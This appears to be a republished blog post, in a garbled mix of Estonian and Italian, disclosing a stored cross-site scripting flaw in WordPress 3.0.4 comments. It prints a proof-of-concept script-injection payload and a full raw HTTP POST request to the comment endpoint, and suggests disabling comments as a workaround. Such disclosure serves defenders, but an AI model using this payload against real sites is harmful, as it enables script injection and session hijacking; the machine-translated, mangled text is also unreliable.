WordPress 3.0.4 esitleb di vulnerabilità Salvestatud XSS.
La grave vulnerabilità permette ad un qualsiasi visitatore di commentare un post inserendo all’interno del codice malevolo.
Lahendus: Keela võimaluse kommenteerida postitused
### HAAVATAVATE TOODE ### + WordPress: "WordPress on veebi tarkvara abil saab luua kaunis veebisaidi või blogi. Meile meeldib öelda, et WordPress on nii vaba ja hindamatu samal ajal." + Kodulehekülg: http://wordpress.org ### HAAVATAVUST DETAILID ### + Kirjeldus: Ründajad on võimalik täita pahatahtlik javascript koodi või ärandamine istungil privileeg eskaleerumise. Ründaja peab asutus toimetaja. Screenshot: http://img3.imageshack.us/img3/1148/wordpressx.png PoC: ""--></stiil></script><script>alert("XSS")</script> POST http://localhost/wordpress304/wp-comments-post.php HTTP/1.1 Host: localhost Connection: keep-alive Referer: http://localhost/wordpress304 /?page_id=2 Content-Length: 189 Cache-Control: max-age=0 Origin: http://localhost Content-Type: application/x-www-form-urlencoded Accept: application / xml,application / xhtml xml,text / html;q = 0,9, text / plain;q = 0.8, image / png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,DEFLATE,sdch Accept-Language: en-US,en;q = 0.8, en-US;q = 0,6, mis;q=0.4 Accept-Charset: ISO-8859-9, utf-8;q = 0.7 *;q=0.3 Cookie: wp-settings-time-1 = 1293719651; wordpress_test_cookie = WP Cookie kontrollima; wordpress_logged_in_a9710e337f5b83061184233e85654d2c=editor% 7C1293893085%7C1b3f84f58059c0fcf262ef1bb83635c2; wp-settings-time-3=1293720285 comment=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&submit = Post Kommenteeri&comment_post_ID = 2 &comment_parent = 0&_wp_unfiltered_html_comment = 7741b495eb
The post XSS Salvestatud haavatavus – WordPress 3.0.4 !!! appeared first on .